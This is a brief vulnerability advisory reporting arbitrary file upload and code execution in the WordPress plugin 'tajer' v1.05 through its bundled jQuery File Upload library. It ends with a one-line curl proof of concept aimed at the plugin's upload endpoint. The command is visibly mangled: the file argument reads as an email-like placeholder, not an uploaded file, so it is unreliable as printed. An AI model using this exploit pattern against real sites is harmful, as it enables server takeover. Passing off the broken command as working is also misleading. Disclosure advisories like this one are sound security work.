Title: Arbitrary file upload vulnerability in WordPress Plugin tajer v1.05
Author: Larry W. Cashdollar, @_larry0
Download Site: https://wordpress.org/plugins/tajer
Vendor Notified: no
Description: Tajer – All In One eCommerce WordPress Premium Class Plugin.
You can sell any kind of digital goods: downloads, articles, a piece of content or any kind of content or virtual products.
This plugin has components of Blueimp's jQuery file upload that is vulnerable to arbitrary file upload and code execution.
curl -F "firstname.lastname@example.org" http://192.168.0.47/wp-content/plugins/tajer/lib/jQuery-File-Upload-master/server/php/index.php